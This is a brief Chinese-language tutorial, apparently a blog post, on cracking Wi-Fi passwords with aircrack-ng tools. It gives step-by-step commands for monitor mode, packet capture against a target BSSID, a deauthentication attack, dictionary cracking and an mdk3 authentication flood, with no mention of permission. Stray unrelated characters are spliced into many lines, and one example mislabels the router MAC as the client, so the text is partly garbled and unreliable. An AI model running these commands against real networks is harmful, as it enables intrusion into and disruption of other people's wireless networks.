輸入airmon-ng wlan0 up加載無線網(wǎng)卡披摄;
之后輸入airmon-ng start wlan0激活網(wǎng)卡到監(jiān)聽模式monitor
airmon-ng start wlan0 n 加隧道 可選
airodump-ng mon0進行探測我們要攻擊的目標主機
//指定隧道掃描
繼續(xù)輸入airodump-ng --ivs -w abc -c 6 mon0 開始抓包!
--ivs是通過ivs過濾驻子,只保留可以破解密碼的報文.ivs文件,
這樣比較快點;-w是將抓取的報文寫入命名為abc并保存
(之后會在當前文件夾保存為abc-01.ivs);-c后面跟頻道,如這里的6 售躁。 、
//自定mac掃描
root@kali:~# airodump-ng --ivs -w wifi-pass --bssid 1C:60:DE:77:B9:C0 -c 1 wlan0mon
然后新開一個終端窗口谴仙,對目標主機進行deauth攻擊迂求,以加速抓包碾盐!
命令格式aireplay-ng -0 大小 -a 目標主機mac -c 客戶端 mac mon0
本例中的為
aireplay-ng -0 10 -a mac地址 -c 路由mac地址 wlan0mon
接下來最好還是再開一個終端窗口晃跺,輸入aircrack-ng abc-01.ivs -w /root/pass.text,
然后輸入要破解的無線網(wǎng)絡(luò)序號開始破解密碼毫玖!
特例:
可以使用mdk3工具對目標進行洪水驗證攻擊掀虎,效果不錯:
mdk3 mon0 a -a 目標主機mac
關(guān)閉監(jiān)聽
airmon-ng stop wlan0mon